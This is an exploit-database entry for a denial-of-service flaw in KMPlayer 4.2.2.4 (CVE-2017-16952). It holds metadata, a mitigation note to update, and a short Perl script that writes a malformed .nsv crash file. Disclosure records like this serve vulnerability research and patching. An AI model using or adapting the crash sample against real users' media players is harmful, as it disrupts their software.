header-logo
Suggest Exploit
vendor:
KMPlayer
by:
R.Yavari
5,5
CVSS
MEDIUM
Denial of Service
400
CWE
Product Name: KMPlayer
Affected Version From: v4.2.2.4
Affected Version To: v4.2.2.4
Patch Exists: YES
Related CWE: CVE-2017-16952
CPE: KMPlayer
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 10, Windows 7
2017

KMPlayer .nsv Denial of Service

A denial of service vulnerability exists in KMPlayer v4.2.2.4 when a specially crafted .nsv file is opened, which could allow an attacker to cause a denial of service condition.

Mitigation:

Users should update to the latest version of KMPlayer to mitigate this vulnerability.
Source

Exploit-DB raw data:

#!/usr/bin/perl
# Exploit Title: KMPlayer .nsv Denial of Service
# Date: 2017-11-22
# Exploit Author: R.Yavari
# Version: v4.2.2.4 
# Tested on: Windows 10 , Windows 7
# other version should be affected
# NSV is Streaming video container format developed by Nullsoft; used for streaming video clips over the Internet,
# such as video feeds for Winamp TV; supports multiple types of compression and can include multiple audio tracks, subtitles, and other data.
# CVE-2017-16952
# http://cdn.kmplayer.com/KMP/Download/release/chrome/4.2.2.4/KMPlayer_4.2.2.4.exe
# (D.P)

open(code, ">kmplayer.nsv") || die "can't create crash sample.$!";
binmode(code);
$data = 
"\x52\x49\x46\x46\xc2\x58\x01\x00\x57\x41\x56\x45";
print code $data;
 
close(code);